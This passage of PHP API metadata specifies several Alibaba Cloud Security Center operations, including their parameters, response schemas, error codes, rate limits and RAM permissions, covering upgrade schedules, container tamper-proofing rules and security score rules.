'云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetPropertyScheduleConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"B37C9052-A73E-4707-A024-92477028****\\",\\n \\"PropertyScheduleConfig\\": {\\n \\"ScheduleTime\\": \\"3\\",\\n \\"Type\\": \\"scheduler_account_period\\",\\n \\"NextScheduleTime\\": 1671630647018\\n }\\n}","type":"json"}]', ], 'GetPublishCron' => [ 'summary' => 'Retrieves the client upgrade time configuration.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '30CBF632-109F-596F-97F2-451C8B2A****', 'title' => ''], 'Data' => [ 'description' => 'The publish scheduling configuration.', 'type' => 'object', 'properties' => [ 'Cron' => ['description' => 'The cron expression for the upgrade start time.', 'type' => 'string', 'example' => '0 0 7 * * ?', 'title' => ''], 'Duration' => ['description' => 'The upgrade duration. Unit: hours.', 'type' => 'integer', 'format' => 'int32', 'example' => '24', 'title' => ''], 'CronType' => ['description' => 'The upgrade start cycle type. Valid values:'."\n" .'- **day**: every day'."\n" .'- **week**: every week.', 'type' => 'string', 'example' => 'day', 'title' => ''], 'CronDay' => ['description' => 'The day of the week for the upgrade. Valid values:'."\n" .'- **MON**: Monday'."\n" .'- **TUE**: Tuesday'."\n" .'- **WED**: Wednesday'."\n" .'- **THU**: Thursday'."\n" .'- **FRI**: Friday'."\n" .'- **SAT**: Saturday'."\n" .'- **SUN**: Sunday.', 'type' => 'string', 'example' => 'MON', 'title' => ''], 'CronTime' => ['description' => 'The publish start timestamp. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1724522400000', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve client upgrade time configuration', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetPublishCron'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetPublishCron', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"30CBF632-109F-596F-97F2-451C8B2A****\\",\\n \\"Data\\": {\\n \\"Cron\\": \\"0 0 7 * * ?\\",\\n \\"Duration\\": 24,\\n \\"CronType\\": \\"day\\",\\n \\"CronDay\\": \\"MON\\",\\n \\"CronTime\\": 1724522400000\\n }\\n}","type":"json"}]', ], 'GetRdTree' => [ 'summary' => 'Queries the directory structure of the resource organization under a resource directory by using the multi-account management feature.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '213144', 'abilityTreeNodes' => ['FEATUREsas8YMQ5V'], ], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PlainResult', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The processing result.', 'type' => 'object', 'properties' => [ 'FolderId' => ['title' => '', 'description' => 'The ID of the folder in the resource directory.', 'type' => 'string', 'example' => 'fd-CGA73I****'], 'FolderName' => ['title' => '', 'description' => 'The folder name.', 'type' => 'string', 'example' => 'Root'], 'Children' => [ 'title' => '', 'description' => 'The child folders.', 'type' => 'array', 'items' => ['description' => 'The child node structure, which is the same as the parent node structure.', 'type' => 'any', 'example' => '{'."\n" .' "children": ['."\n" .' {'."\n" .' "folderName": "345****",'."\n" .' "folderId": "fd-3T3LR6N****"'."\n" .' }'."\n" .' ],'."\n" .' "folderName": "123****",'."\n" .' "folderId": "fd-rEdk0a8***"'."\n" .'}', 'title' => ''], 'example' => '', ], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique identifier for each API request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '30CBF632-109F-596F-97F2-451C8B2A****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query the directory structure of a resource organization under a resource directory', 'description' => 'Call this operation by using the management account of the resource directory or the delegated administrator account of Security Center.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetRdTree'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetRdTree', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"FolderId\\": \\"fd-CGA73I****\\",\\n \\"FolderName\\": \\"Root\\",\\n \\"Children\\": [\\n \\"{\\\\n \\\\\\"children\\\\\\": [\\\\n {\\\\n \\\\\\"folderName\\\\\\": \\\\\\"345****\\\\\\",\\\\n \\\\\\"folderId\\\\\\": \\\\\\"fd-3T3LR6N****\\\\\\"\\\\n }\\\\n ],\\\\n \\\\\\"folderName\\\\\\": \\\\\\"123****\\\\\\",\\\\n \\\\\\"folderId\\\\\\": \\\\\\"fd-rEdk0a8***\\\\\\"\\\\n}\\"\\n ]\\n },\\n \\"RequestId\\": \\"30CBF632-109F-596F-97F2-451C8B2A****\\"\\n}","type":"json"}]', ], 'GetRegistryScanDayNum' => [ 'summary' => 'Queries the time range for image security scanning.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. China Chinese Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '09969D2C-4FAD-429E-BFBF-9A60DEF8****', 'title' => ''], 'ScanDayNumConfig' => [ 'description' => 'The scan day configuration.', 'type' => 'object', 'properties' => [ 'ScanDayNum' => ['description' => 'The scan time range. Unit: days.', 'type' => 'integer', 'format' => 'int32', 'example' => '7', 'title' => ''], 'DayNumList' => ['description' => 'The list of available day options.', 'type' => 'string', 'example' => '1,3,7,15,30,90,180,365', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query image security scan time range', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetRegistryScanDayNum'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetRegistryScanDayNum', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"09969D2C-4FAD-429E-BFBF-9A60DEF8****\\",\\n \\"ScanDayNumConfig\\": {\\n \\"ScanDayNum\\": 7,\\n \\"DayNumList\\": \\"1,3,7,15,30,90,180,365\\"\\n }\\n}","type":"json"}]', ], 'GetRulesCount' => [ 'summary' => 'Queries the number of system defense rules and user-defined rules.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response body.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. The China Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'BE120DAB-F4E7-4C53-ADC3-A97578AB****', 'title' => ''], 'TotalUserDefineRuleCount' => ['description' => 'The total number of user-defined rules.', 'type' => 'integer', 'format' => 'int64', 'example' => '10', 'title' => ''], 'TotalSystemClientRuleCount' => ['description' => 'The total number of system defense rules.', 'type' => 'integer', 'format' => 'int64', 'example' => '10', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query the number of system defense rules and user-defined rules', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetRulesCount'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetRulesCount', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"BE120DAB-F4E7-4C53-ADC3-A97578AB****\\",\\n \\"TotalUserDefineRuleCount\\": 10,\\n \\"TotalSystemClientRuleCount\\": 10\\n}","type":"json"}]', ], 'GetSasContainerWebDefenseRule' => [ 'summary' => 'Retrieves a container file defense rule.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free'], 'parameters' => [ [ 'name' => 'RuleId', 'in' => 'query', 'schema' => ['description' => 'The rule ID.'."\n" .'> You can call the [ListSasContainerWebDefenseRule](~~ListSasContainerWebDefenseRule~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1600009', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'BA674E4**62FB5133', 'title' => ''], 'ContainerWebDefenseRule' => [ 'description' => 'The details of the container file defense rule.', 'type' => 'object', 'properties' => [ 'RuleStatus' => ['description' => 'The rule status. Valid values:'."\n" ."\n" .'- **1**: Enabled.'."\n" .'- **0**: Disabled.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'AliUid' => ['description' => 'The user ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '1000**0002', 'title' => ''], 'AppTotalCount' => ['description' => 'The total number of applications.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Id' => ['description' => 'The rule ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '100', 'title' => ''], 'RuleName' => ['description' => 'The rule name.', 'type' => 'string', 'example' => '防篡改规则', 'title' => ''], 'GmtCreate' => ['description' => 'The timestamp when the rule was created. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1709173360000', 'title' => ''], 'GmtModified' => ['description' => 'The timestamp when the rule was modified. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1655432638000', 'title' => ''], 'PathConfDTOList' => [ 'description' => 'The list of configured file paths.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'ExcludeFile' => ['description' => 'The excluded file.', 'type' => 'string', 'example' => 'file1', 'title' => ''], 'GuardType' => ['description' => 'The defense mode. Valid values:'."\n" .'- **0**: Basic pattern (whitelist).'."\n" .'- **1**: Advanced pattern (blacklist).', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'ExcludeFilePath' => ['description' => 'The excluded file path.', 'type' => 'string', 'example' => '/test2/sub1,/test2/sub2', 'title' => ''], 'IncludeFile' => ['description' => 'The included file.', 'type' => 'string', 'example' => 'webapp', 'title' => ''], 'DefensePath' => ['description' => 'The defense path.', 'type' => 'string', 'example' => '/test11*', 'title' => ''], 'ExcludeFileType' => ['description' => 'The excluded file type.', 'type' => 'string', 'example' => 'doc', 'title' => ''], 'DefenseMode' => ['description' => 'The action to take. Valid values:'."\n" .'- **block**: Block.'."\n" .'- **audit**: Alert.', 'type' => 'string', 'example' => 'audit', 'title' => ''], 'BackupPath' => ['description' => 'The backup path.', 'type' => 'string', 'example' => '/usr/path/', 'title' => ''], 'IncludeFileType' => ['description' => 'The included file type.', 'type' => 'string', 'example' => 'doc', 'title' => ''], 'ProcessPathList' => [ 'description' => 'The list of whitelisted processes.', 'type' => 'array', 'items' => ['description' => 'The whitelisted process.', 'type' => 'string', 'example' => '/bin/proc1a,/bin/proc1b', 'title' => ''], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Retrieve container file defense rule details', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetSasContainerWebDefenseRule'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetSasContainerWebDefenseRule', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"BA674E4**62FB5133\\",\\n \\"ContainerWebDefenseRule\\": {\\n \\"RuleStatus\\": 1,\\n \\"AliUid\\": 0,\\n \\"AppTotalCount\\": 1,\\n \\"Id\\": 100,\\n \\"RuleName\\": \\"防篡改规则\\",\\n \\"GmtCreate\\": 1709173360000,\\n \\"GmtModified\\": 1655432638000,\\n \\"PathConfDTOList\\": [\\n {\\n \\"ExcludeFile\\": \\"file1\\",\\n \\"GuardType\\": 0,\\n \\"ExcludeFilePath\\": \\"/test2/sub1,/test2/sub2\\",\\n \\"IncludeFile\\": \\"webapp\\",\\n \\"DefensePath\\": \\"/test11*\\",\\n \\"ExcludeFileType\\": \\"doc\\",\\n \\"DefenseMode\\": \\"audit\\",\\n \\"BackupPath\\": \\"/usr/path/\\",\\n \\"IncludeFileType\\": \\"doc\\",\\n \\"ProcessPathList\\": [\\n \\"/bin/proc1a,/bin/proc1b\\"\\n ]\\n }\\n ]\\n }\\n}","type":"json"}]', ], 'GetSasContainerWebDefenseRuleApplication' => [ 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free'], 'parameters' => [ [ 'name' => 'RuleId', 'in' => 'query', 'schema' => ['description' => 'The rule ID.'."\n" .'> You can call the ListSasContainerWebDefenseRule operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '400599', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '09969D2C-4FAD-429E-BFBF-9A60DEF8****', 'title' => ''], 'ContainerWebDefenseAppList' => [ 'description' => 'The application list.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'GmtCreate' => ['description' => 'The creation time of the application, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1677839038000', 'title' => ''], 'AliUid' => ['description' => 'The user ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '5944922169365****', 'title' => ''], 'Tag' => ['description' => 'The application tag value.', 'type' => 'string', 'example' => 'app:test', 'title' => ''], 'GmtModified' => ['description' => 'The most recent modification time, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1667891185000', 'title' => ''], 'Id' => ['description' => 'The ID of the current node.', 'type' => 'integer', 'format' => 'int64', 'example' => '143761', 'title' => ''], 'RuleId' => ['description' => 'The rule ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '403327', 'title' => ''], 'ClusterId' => ['description' => 'The ID of the container cluster.'."\n" .'> You can call the [DescribeGroupedContainerInstances](~~182997~~) operation to obtain this parameter.', 'type' => 'string', 'example' => 'cfb41a869c71e4678a97021582dd8****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve the application list for container file defense configurations', 'summary' => 'Retrieves the list of applications for container file defense configurations.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetSasContainerWebDefenseRuleApplication'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetSasContainerWebDefenseRuleApplication', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"09969D2C-4FAD-429E-BFBF-9A60DEF8****\\",\\n \\"ContainerWebDefenseAppList\\": [\\n {\\n \\"GmtCreate\\": 1677839038000,\\n \\"AliUid\\": 0,\\n \\"Tag\\": \\"app:test\\",\\n \\"GmtModified\\": 1667891185000,\\n \\"Id\\": 143761,\\n \\"RuleId\\": 403327,\\n \\"ClusterId\\": \\"cfb41a869c71e4678a97021582dd8****\\"\\n }\\n ]\\n}","type":"json"}]', ], 'GetSasContainerWebDefenseRuleCriteria' => [ 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '166839', 'abilityTreeNodes' => ['FEATUREsasA0IBMB'], ], 'parameters' => [ [ 'name' => 'Value', 'in' => 'query', 'schema' => ['description' => 'The value of the query criterion. Fuzzy match is supported.', 'type' => 'string', 'required' => false, 'example' => '525', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => 'F8B6F758-BCD4-597A-8A2C-DA5A552C****', 'title' => ''], 'CriteriaList' => [ 'description' => 'The list of query criteria.', 'type' => 'array', 'items' => [ 'description' => 'The search criterion information.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of the query criterion. Valid values:'."\n" .'- **input**: Input type. You must manually enter the query content when using this query criterion.'."\n" .'- **select**: Selection type. You must select a value from the options list (the **Values** field) when using this query criterion.', 'type' => 'string', 'example' => 'select', 'title' => ''], 'Name' => ['description' => 'The name of the query criterion.', 'type' => 'string', 'example' => 'name', 'title' => ''], 'Values' => ['description' => 'The available options when **Type** (the type of the query criterion) is set to **select** (selection type).'."\n" .'> When **Type** (the type of the query criterion) is set to **input** (input type), this parameter returns an empty value.', 'type' => 'string', 'example' => 'athor_bid', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => '-100', 'errorMessage' => 'The service is unavailable, please try again later.', 'description' => ''], ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'Retrieve query criteria for container tamper-proofing rules', 'summary' => 'Retrieves the query criteria for container tamper-proofing rules.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetSasContainerWebDefenseRuleCriteria'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetSasContainerWebDefenseRuleCriteria', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F8B6F758-BCD4-597A-8A2C-DA5A552C****\\",\\n \\"CriteriaList\\": [\\n {\\n \\"Type\\": \\"select\\",\\n \\"Name\\": \\"name\\",\\n \\"Values\\": \\"athor_bid\\"\\n }\\n ]\\n}","type":"json"}]', ], 'GetSecurityScoreRule' => [ 'summary' => 'Queries the details of custom security scoring rules.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '182574', 'abilityTreeNodes' => ['FEATUREsasJODUMM'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'CalType', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to query the new or legacy security score rules. If the value is **home_security_score**, the new security score rules are queried. Otherwise, the legacy security score rules are queried by default.', 'type' => 'string', 'required' => false, 'example' => 'home_security_score', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'F8B6F758-BCD4-597A-8A2C-DA5A552C****', 'title' => ''], 'SecurityScoreRuleList' => [ 'description' => 'The list of legacy security score rules.', 'type' => 'array', 'items' => [ 'description' => 'The security score rule data.', 'type' => 'object', 'properties' => [ 'RuleType' => ['description' => 'The type of the security score rule. Valid values:'."\n" .'- SS_REINFORCE: Key feature configuration.'."\n" .'- SS_ALARM: Pending alerts.'."\n" .'- SS_VUL: Pending vulnerabilities to fix.'."\n" .'- SS_HC: Baseline issues.'."\n" .'- SS_CLOUD_HC: Cloud platform configuration check item issues.'."\n" .'- SS_AK: AccessKey leakage risk exists.', 'type' => 'string', 'example' => 'SS_ALARM', 'title' => ''], 'Score' => ['description' => 'The deduction value of the security score rule.'."\n" ."\n" .'> The configurable range is 0 to 100 points. The sum of all security score rule deduction thresholds must equal 100 points.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'Title' => ['description' => 'The description of the security score rule.', 'type' => 'string', 'example' => 'Unhandled Alerts', 'title' => ''], 'SecurityScoreItemList' => [ 'description' => 'The list of individual deduction items for the security score rule.', 'type' => 'array', 'items' => [ 'description' => 'The individual deduction item data for the security score rule.', 'type' => 'object', 'properties' => [ 'SubRuleType' => ['description' => 'The sub-rule type of the security score deduction item. The relationship between security score categorization types and sub-rule types is as follows:'."\n" .'- SS_REINFORCE: Key feature configuration.'."\n" .' - XPRESS_INSTALL: Security Center service authorization is not enabled.'."\n" .' - REINFORCE_SUSPICIOUS: Anti-virus feature is not enabled.'."\n" .' - RANSOMWARE: Anti-ransomware policy is not enabled.'."\n" .' - WEB_LOCK: Web tamper-proofing feature is not enabled.'."\n" .' - VIRUS_SCHEDULE_SCAN: Periodic virus scan policy is not enabled.'."\n" .' - IMAGE_REPO_SCAN: Container image scan scope is not configured.'."\n" .' - IMAGE_SCAN_TASK: One-click container image security risk scan has not been executed.'."\n" ."\n" .'- SS_ALARM: Pending alerts.'."\n" .' - ALARM_SERIOUS: One unhandled high-risk alert event exists.'."\n" .' - ALARM_SUSPICIOUS: One unhandled medium-risk alert event exists.'."\n" .' - ALARM_REMIND: One unhandled low-risk alert event exists.'."\n" ."\n" .'- SS_VUL: Pending vulnerabilities to fix.'."\n" .' - CMS_UNFIX: One unfixed CMS vulnerability exists.'."\n" .' - WIN_UNFIX: One unfixed Windows host vulnerability exists.'."\n" .' - CVE_UNFIX: One unfixed Linux host vulnerability exists.'."\n" .' - ERM_UNFIX: One unfixed emergency vulnerability exists.'."\n" .' - ERM_UNCHECK: One undetected emergency vulnerability exists.'."\n" ."\n" .'- SS_HC: Baseline issues.'."\n" .' - WEAK_EXPLOIT: Weak password risk exposed to the Internet exists.'."\n" .' - WEAK_PASSWORD: Weak password risk exists.'."\n" .' - HC_EXPLOIT: High-risk intrusion vulnerability exists.'."\n" .' - HC_OTHER_WARNING: Security configuration risk exists.'."\n" ."\n" .'- SS_CLOUD_HC: Cloud platform configuration check item issues.'."\n" .' - CSPM_CIEM_NOT_PASS: One failed CIEM check item exists.'."\n" .' - CSPM_RISK_NOT_PASS: One failed security risk check item exists.'."\n" .' - CSPM_COMPLIANCE_NOT_PASS: One failed compliance check item exists.'."\n" ."\n" .'- SS_AK: AccessKey leakage risk exists.', 'type' => 'string', 'example' => 'ALARM_SERIOUS', 'title' => ''], 'Score' => ['description' => 'The deduction value of the individual item.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'ScoreThreshold' => ['description' => 'The deduction threshold of the individual item.'."\n" ."\n" .'> The configurable range is 0 to the deduction threshold of the security score rule.', 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], 'Title' => ['description' => 'The description of the sub-rule type for the security score deduction item.', 'type' => 'string', 'example' => 'Unhandled Urgent Alert Event Exists', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'EnableStatus' => ['description' => 'The enabling status of the custom security scoring rule. Valid values:'."\n" .'- true: Enabled.'."\n" .'- false: Not enabled.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'SecurityScoreCategoryList' => [ 'description' => 'The list of new security score rules.', 'type' => 'array', 'items' => [ 'description' => 'The security score rule data.', 'type' => 'object', 'properties' => [ 'SecurityRuleList' => [ 'description' => 'The deduction list of security score rule types.', 'type' => 'array', 'items' => [ 'description' => 'The security score rule type data.', 'type' => 'object', 'properties' => [ 'RuleType' => ['description' => 'The type of the security score rule.', 'type' => 'string', 'example' => 'SS_AI_RISK', 'title' => ''], 'Score' => ['description' => 'The deduction threshold of the security score rule type.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'Title' => ['description' => 'The name of the security score rule type.', 'type' => 'string', 'example' => 'AI Application Risks'."\n", 'title' => ''], 'SecurityScoreItemList' => [ 'description' => 'The deduction list of security score rule sub-items.', 'type' => 'array', 'items' => [ 'description' => 'The security score rule sub-item data.', 'type' => 'object', 'properties' => [ 'SubRuleType' => ['description' => 'The type of the security score rule sub-item. Valid values:'."\n" ."\n" .'- **SS_SAS_WEAK_PW**: Pending weak passwords to fix.'."\n" .'- **SS_SAS_ALARM**: Pending Security Center alerts.'."\n" .'- **SS_SAS_EMG_VUL**: Pending emergency vulnerabilities to fix.'."\n" .'- **SS_SAS_APP_VUL**: Pending application vulnerabilities to fix.'."\n" .'- **SS_SAS_SYS_VUL**: Pending system vulnerabilities to fix.'."\n" .'- 